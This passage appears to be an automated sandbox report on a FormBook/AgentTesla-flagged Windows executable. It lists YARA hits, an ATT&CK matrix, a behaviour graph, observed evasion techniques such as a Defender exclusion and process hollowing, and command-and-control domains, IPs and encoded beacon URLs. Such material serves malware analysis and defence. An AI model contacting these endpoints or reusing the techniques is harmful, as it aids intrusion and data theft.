          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Process Injection512Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery431Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion151Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSVirtualization/Sandbox Evasion151Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery112Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402848 Sample: HAWB AND INV.exe Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 43 www.jaimericart.com 2->43 45 www.beachrockisland.com 2->45 47 2 other IPs or domains 2->47 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 10 other signatures 2->67 9 HAWB AND INV.exe 7 2->9         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\qxnptkmQbHB.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\tmp9D41.tmp, XML 9->39 dropped 41 C:\Users\user\...\HAWB AND INV.exe.log, ASCII 9->41 dropped 73 Adds a directory exclusion to Windows Defender 9->73 13 HAWB AND INV.exe 9->13         started        16 powershell.exe 26 9->16         started        18 powershell.exe 24 9->18         started        20 2 other processes 9->20 signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 13->75 77 Maps a DLL or memory area into another process 13->77 79 Sample uses process hollowing technique 13->79 81 Queues an APC in another process (thread injection) 13->81 22 explorer.exe 13->22 injected 26 conhost.exe 16->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        process9 dnsIp10 49 www.premier-moment.info 202.254.234.152, 49757, 80 SAKURA-CSAKURAInternetIncJP Japan 22->49 51 ecosanhn.com 181.214.142.2, 49760, 80 ASDETUKhttpwwwheficedcomGB Chile 22->51 53 8 other IPs or domains 22->53 69 System process connects to network (likely due to code injection or exploit) 22->69 71 Uses ipconfig to lookup or modify the Windows network settings 22->71 34 ipconfig.exe 22->34         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 34->55 57 Maps a DLL or memory area into another process 34->57 59 Tries to detect virtualization through RDTSC time measurements 34->59

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HAWB AND INV.exe21%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe21%ReversingLabsWin32.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.HAWB AND INV.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.premier-moment.info0%VirustotalBrowse
          ecosanhn.com0%VirustotalBrowse
          jaimericart.com0%VirustotalBrowse
          networkingmaderas.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.microX%0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          www.alldaazz.com/maw9/0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.premier-moment.info
          		202.254.234.152
          		truetrueunknown
          ecosanhn.com
          		181.214.142.2
          		truetrueunknown
          jaimericart.com
          		81.88.48.71
          		truetrueunknown
          networkingmaderas.com
          		107.180.57.119
          		truetrueunknown
          www.itechfreak.com
          		192.238.144.41
          		truefalse
            		unknown
            dinkoistmatrimony.com
            		34.102.136.180
            		truefalse
              		unknown
              curvygirlholiday.com
              		34.102.136.180
              		truefalse
                		unknown
                www.vipbrandwatch.info
                		unknown
                		unknowntrue
                  		unknown
                  www.networkingmaderas.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.beachrockisland.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.curvygirlholiday.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.dinkoistmatrimony.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ecosanhn.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.jaimericart.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              www.alldaazz.com/maw9/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://go.microX%powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.tiro.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://go.cpanel.net/privacyipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssHAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.netDexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://fontfabrik.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fonts.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.sakkal.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://github.com/unguestHAWB AND INV.exefalse
                                                                  		high
                                                                  https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGPropertyHAWB AND INV.exefalse
                                                                    		high

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    181.214.142.2
                                                                    		ecosanhn.comChile
                                                                    		61317ASDETUKhttpwwwheficedcomGBtrue
                                                                    34.102.136.180
                                                                    		dinkoistmatrimony.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    107.180.57.119
                                                                    		networkingmaderas.comUnited States
                                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                    202.254.234.152
                                                                    		www.premier-moment.infoJapan9371SAKURA-CSAKURAInternetIncJPtrue

                                                                    General Information

                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                    Analysis ID:402848
                                                                    Start date:03.05.2021
                                                                    Start time:14:51:24
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 13m 35s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Sample file name:HAWB AND INV.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:29
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@16/19@9/4
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 8.2% (good quality ratio 7.3%)
                                                                    • Quality average: 72%
                                                                    • Quality standard deviation: 32%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 81
                                                                    • Number of non-executed functions: 166
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
